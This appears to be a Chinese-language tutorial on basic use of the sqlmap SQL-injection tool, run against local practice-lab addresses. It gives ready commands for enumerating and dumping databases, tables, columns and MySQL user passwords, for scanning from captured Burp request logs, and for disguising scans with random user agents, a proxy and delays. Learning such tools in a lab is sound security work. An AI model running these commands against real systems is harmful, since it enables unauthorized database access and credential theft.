sqlMap的简单使用

简单使用"/>

sqlMap的简单使用

文章目录

• 0 参数
• 一、单个、多个 url 查询
• 2 自动爆 数据库名称+表名+列名
• 2.1 自动爆 一个数据库下面的表-列名 -D
• 2.2 报一个表的字段
• 二 ，http 头部文件 扫描
• 三 ，http bp日志扫描
• 3. 指定 http 里面 的 User-Agent
• 4.基于代理去跑 安全

提示：

0 参数

--batch # 默认
--dbs  #爆出数据库
--tables #爆出 全部表
--columns # 爆出 全部 列的名字
--hostname  # 目标主机名字
--passwords # mysql密码
-u 单个查询  格式： 字符串 “url?id=1”-m 多个查询  格式：  txt   “url?id=1”  “url?id=1”“url?id=1”-r http 头部查询	  格式：  txt   记得用 【--level 5 】 （cookie，nc什么什么的）

一、单个、多个 url 查询

1.单个 -u

sqlmap -u "192.168.0.63/sqli/fei1/?id=1"

1.多个 -m

sqlmap -m feixiang.txt

feixiang.txt:

192.168.0.63/sqli/fei1/?id=1
192.168.0.63/sqli/fei2/?id=1
192.168.0.63/sqli/fei3/?id=1

2 自动爆 数据库名称+表名+列名

1. 数据库名称： --dbs
2. 表名 ： --tables
3. 列名： --columns

2.1 自动爆 一个数据库下面的表-列名 -D

sqlmap -u 'url?id=1' --dbs --tables --columns --dump  --batch 

2.2 报一个表的字段

sqlmap -u "http://192.168.0.66/?id=1" --batch -D mysql -T user -C "User" --dump --threads 10

二 ，http 头部文件 扫描

sqlmap -r http.txt  --batch 

http.txt:

GET /sqli/Less-20/index.php HTTP/1.1Host: 192.168.0.63
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.63/sqli/Less-20/
Connection: close
Cookie: uname=admin
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

三 ，http bp日志扫描

1. 使用bp抓包 保持访问过的 http头部文件
   

sqlmap -l bp.txt --batch --dbs --level 5

-l :log http log 的意思
–level 5 ： cookie 等http头部文件查询

3. 指定 http 里面 的 User-Agent

3.1 手动

sqlmap -u "url?id=1"  --user-agent="龙老板" --batch

3.1 自动

sqlmap -u "url?id=1"  --random-agent --batch

4.基于代理去跑 安全

sqlmap -u "url?id=1"  --proxy "http://192.168.0.111:10800(外网连接)" --delay="1"  --random-agent --batch

–delay # 1毫秒